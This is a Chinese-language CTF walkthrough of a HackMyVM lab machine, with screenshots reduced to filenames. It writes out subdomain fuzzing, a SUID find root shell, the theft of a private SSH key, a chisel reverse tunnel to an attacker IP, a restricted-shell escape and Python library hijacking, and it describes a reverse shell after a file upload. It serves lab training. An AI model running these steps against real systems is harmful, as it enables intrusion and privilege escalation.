寻找存活靶机:

image-20250423212144764

image-20250423212646086

看一下web服务

image-20250423212832052

简单的一个nginx欢迎页面

扫到robots.txt

image-20250423212942906

三个路径分别去访问

image-20250423213326217

image-20250423213349058

image-20250423213431687

image-20250423213634368

按照提示去扫目录

扫到

image-20250423213949706

image-20250423214118452

image-20250423214215015

得到子域名T4L0S.HMV

放入hosts文件

去访问

image-20250423214453892

提示我们还有子域

枚举

ffuf -u http://t4l0s.hmv -H 'Host: FUZZ.t4l0s.hmv' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 615

image-20250423214654126

也加进hosts文件中

image-20250423214905863

证明了我们方向是对的

接下来扫一下目录得到upload.php

改掉MIME类型即可上传根据返回包判断出文件路径

直接nc弹shell即可

image-20250423220243223

image-20250423221013592

suid find提权

find . -exec /bin/sh -p \; -quit

image-20250423221122378

image-20250423221245525

image-20250423221312147

根据十二神的姓名查找文件

for line in $(cat name.txt); do find / -iname *$line* 2>/dev/null; done

image-20250423221521959

查看/etc/selinux/Afrodita.key

image-20250423221613104

得到了talos密码

image-20250423221804405

切换用户后发现可以elohim权限用cp

这样我们就可以借助打印缓冲区读取我们想要读取的文件

image-20250423222513123

查看端口开放服务

ss -tlune

image-20250423222636949

3445有ssh服务但是我们又不能直接访问

所以我们将其流量代理出来之后再用ssh登录

我们找不到gehenna的明文密码但是可以

ssh密钥登陆

私钥一般在

/home/用户名/.ssh/id_rsa

读私钥

image-20250423223338004

然后在将chisel传到靶机上

进行流量代理

./chisel client 192.168.56.103:1475 R:3445:localhost:3445

image-20250417193425721

./chisel server --reverse -p 1475

image-20250417193446103

ssh -i rsa_principle -p 3445 elohim@localhost

登陆时发现私钥使用需要输入密码

image-20250423223821962

image-20250423224010552

在.lock文件中找到十六进制密码

image-20250423224139961

有了密码登陆即可

image-20250417193452301

image-20250417193800418

绕过受限 shell 

bash --noprofile --norc

image-20250417193749133

发现root权限脚本

查看脚本内容

image-20250417193847360

image-20250417194143137

查看ssubprocess.py

image-20250417194255390

由于我们属于 sml 组,我们有写入权限,所以一切都指向 python 库劫持。

image-20250417194915258

成功提权到root权限

image-20250529213242583